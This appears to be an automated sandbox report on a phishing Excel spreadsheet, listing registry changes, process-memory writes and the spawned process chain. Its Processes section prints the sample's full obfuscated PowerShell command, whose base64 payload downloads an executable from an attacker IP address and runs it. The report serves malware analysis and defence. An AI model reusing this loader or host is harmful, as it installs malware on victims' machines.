Malware Analysis Report

2025-01-18 23:29

Sample ID 240626-vs4xtstgrg
Target New Project 7V3655511.xls
SHA256 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64
Tags
phishing
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64

Threat Level: Known bad

The file New Project 7V3655511.xls was found to be: Known bad.

Malicious Activity Summary

phishing

Process spawned unexpected child process

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Detected phishing page

Enumerates physical storage devices

Modifies registry class

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Checks processor information in registry

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 17:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 17:16

Reported

2024-06-26 17:18

Platform

win7-20240221-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\igccu.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Detected phishing page

phishing

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\igccu.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2436 wrote to memory of 2780 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2436 wrote to memory of 2780 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2436 wrote to memory of 2780 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2436 wrote to memory of 2780 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2884 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2884 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2884 wrote to memory of 1656 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1656 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1656 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1656 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1656 wrote to memory of 1308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2884 wrote to memory of 676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2884 wrote to memory of 676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2884 wrote to memory of 676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2884 wrote to memory of 676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New Project 7V3655511.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowErShelL -EX BYpAss -nOp -W 1 -c DEviCEcrEdentIALDEpLoYment ; IEx($(iEx('[SYSTEm.TExt.eNcOding]'+[cHAr]58+[Char]58+'UtF8.gETSTRinG([SyStEm.CoNVErT]'+[cHAr]0X3A+[chaR]58+'FroMBaSE64sTring('+[cHar]0X22+'JGFBb01BZnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVmaW5JVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1Pbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmlELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeHBBcEdKLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmJMLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1DZ3UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKT0d0aVFqT1BDcik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVV3lCbUlqY2VrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeExZICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYUFvTUFmdTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzkxLjkyLjEyMC4xMjcvVDI1MDZXL2xzYXNzLmV4ZSIsIiRlTlY6QVBQREFUQVxpZ2NjdS5leGUiLDAsMCk7U1RBUnQtU0xlZVAoMyk7c3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcaWdjY3UuZXhlIg=='+[cHar]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

